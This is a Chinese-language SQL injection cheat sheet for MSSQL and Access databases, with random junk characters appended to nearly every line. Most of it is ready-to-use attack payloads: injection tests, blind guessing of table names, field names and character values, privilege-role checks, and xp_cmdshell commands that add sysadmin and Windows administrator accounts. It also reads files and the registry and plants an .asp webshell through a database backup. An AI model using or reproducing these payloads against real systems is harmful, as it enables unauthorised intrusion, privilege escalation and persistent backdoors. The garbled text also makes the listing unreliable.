1.判断是否有注入;and 1=1 ;and 1=2 q!W,2xqZoq
2.初步判断是否是mssql ;and user>0 pS8\ B
E#P#{_BR^
3.注入参数是字符'and [查询条件] and ''=' .J -k^+-
1V`-D8-?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ">7xSWR*4
LHtO|Utn(
5.判断数据库系统 ddL3wQ
;X+0,K3c
;and (select count(*) from sysobjects)>0 mssql ubB1a_7
rZ,qHM
;and (select count(*) from msysobjects)>0 access MZ%J
]Nd
i@:^b_
-$!r+4|q
2l,>x
6.猜数据库 ;and (select Count(*) from [数据库名])>0 P:g!~&Q
\:h7,[e
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &</)k|.A6\
lfBCzxifC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `0ZH=*P
9L7z<ntn
9.(1)猜字段的ascii值(access) X(Af`KOg[
6Zpa[,gm
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "6]oi*_8
G739Ne[gL
(2)猜字段的ascii值(mssql) UZ/LR
D*@'%<?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #reR<qp&]
n$ByTmKxv
10.测试权限结构(mssql) 12i`82>;
k|x mZA*
Dz hLb8k
T}\>8EEG
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !l dE9 .
~98q1HgS]D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :&5u)
BUZ74
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7r,GdP .
V@+sNM
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- jA8Bmwt;w
H`<u2fo|p
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1<h@^s ;
/7B3z}rd
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +Q"s!\5
&K!0yR
;and 1=(select IS_MEMBER('db_owner'));-- _&(Wz0
!rgXB(
zx)}XOYf
.z
CkB86
11.添加mssql和系统的帐户 ;xq;c\N
=l2 @'Y Q
;exec master.dbo.sp_addlogin username;-- W\Il@Je;
;exec master.dbo.sp_password null,username,password;-- HziQ%QR
B_#M)d
O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- `!N.1RP _
,PpVZq~
;exec master.dbo.xp_cmdshell 'net user username password Y<^Or
mr[ 1F]G
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- VB^1wm
4Tuh]5
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k'.cl^6Z8
'n{=`e(}cI
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- e8SAjl"}
Q$Qr)mcC
:V"e+I
hJFxT8B/
12.(1)遍历目录 c 9gm%
@ #J2t#
;create table dirs(paths varchar(100), id int) DM6(8df(
c(Xm~
'jeH
;insert dirs exec master.dbo.xp_dirtree 'c:\' vzAY+EEx
1OY
5tq
;and (select top 1 paths from dirs)>0 ,*Wh{)
m k~F@
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0I)eYksh
ko!]vHB9`
fZs}u<3Q)
3-y2i/4}$
(2)遍历目录 V
7 p{'C
|p/[sD+M
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- $XyDw|z[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 %7[d5[U~ZA
{o'(_.{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "@+Z1k-8U
{JQV~rfh`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m,5m'9dj
abVEi[nP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 QeQwmI
4,`t9f^:
j0cB#M44
FKtCUq,:
13.mssql中的存储过程 q.hpnE~#lh
DBfq9%J _
xp_regenumvalues 注册表根键, 子键 &4t=Y`]SL
u<\Sf" fs
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2zsDb'r
$*fEgU% c
xp_regread 根键,子键,键值名 ?YFSK
o|KmKC n>
;exec xp_regread Fyz1LOH[X
|Ntretz`\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 !':y8(Ou
P` CQ)o
xp_regwrite 根键,子键, 值名, 值类型, 值 9$sx+=(
1b7 Q-elG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 06af{FXsGb
lA,[&
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >U:.5Tch'V
/z1-4:^`A[
xp_regdeletevalue 根键,子键,值名 *6(/5V
nqYarHi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V[*<^%
~c,+)69"T
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ZB$,\|^6
UWgPQ%}
d~CZ9h
:Mu]*N
14.mssql的backup创建webshell ['c*<f"
D2
7?Twhs.O
use model GKXd"8z]
wx/*un%2
create table cmd(str image); *]S&V'Di
B%co`0$
insert into cmd(str) values (''); r+k~%5Ff~
(Ixmg=C6y
backup database model to disk='c:\l.asp'; ,Igd<A=
z}$!B.)
t;
#D,gx
?D@WXE0a
15.mssql内置函数 p ^I#9(PT
]1bN cq2I
;and (select @@version)>0 获得Windows的版本号 ];{CNDAL2
K{G\=yJ((
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d?GB#N|+g
covK6SH
;and (select user_name())>0 爆当前系统的连接用户 dr=h;[Q'
?&XpwJw:~
;and (select db_name())>0 得到当前连接的数据库 8 }OII\
>`
|sBx
35#"]l"
w2]]##J
16.简洁的webshell Kb#Z(C9
^,fMs:
use model u3vw[k
`Yo!sgPO\
create table cmd(str image); hRktvO)K
Tml>>O
insert into cmd(str) values (''); hLSas#B>
G8CM
backup database model to disk='g:\wwwtest\l.asp';